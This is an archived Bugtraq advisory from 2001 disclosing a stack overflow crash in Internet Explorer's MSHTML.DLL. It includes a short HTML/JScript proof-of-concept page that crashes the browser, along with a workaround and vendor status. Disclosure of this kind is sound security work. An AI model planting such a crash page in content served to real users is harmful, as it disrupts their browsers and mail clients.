Bugtraq mailing list archives

Stack Overflow in MSHTML.DLL


From: Thor Larholm <thor () JUBII DK>
Date: Mon, 15 Jan 2001 09:04:50 +0100

Stack Overflow in MSHTML.DLL

Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled email readers).
Reliably tested on IE 4.0 and higher on any Windows system, with any service packs
and patches.
Older versions of MSHTML.DLL may be affected too, but remain untested.

Risk: Low/Medium

Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.

Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.

Code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------

Workaround:
Disable Active Scripting.

Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be addressed in a future SP
for IE.

--
Thor Larholm
